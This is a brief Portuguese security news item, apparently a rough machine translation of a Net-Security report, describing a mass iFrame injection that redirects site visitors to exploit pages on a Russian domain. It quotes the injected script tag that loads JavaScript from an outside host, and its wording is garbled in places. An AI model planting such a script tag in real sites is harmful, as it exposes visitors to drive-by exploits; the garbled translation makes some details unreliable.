Os pontos injetados com iFrame para o domínio willysy.com e através de uma série de redirecionamentos e cargas JavaScript de iFrames adicionais, leva o usuário para uma página de um domínioarhyv.ru . Dessa forma, uma uma série de façanhas tentar tirar vantagem de várias de vulnerabilidades no navegador do usuário.
Os pesquisadores afirmam que a infecção resulta de u'a mal sucedida tentativa no iFrame injetado, sendo processado como conteúdo, ao invés do executado, na parte do título do site. De acordo com eles, a injeção inicial de iFrame mais tarde foi substituída com o código:
<script src=http://exero.eu/catalog/jquery.js></script>
Saiba Mais:
[1] Net-Security: http://www.net-security.org/secworld.php?id=11350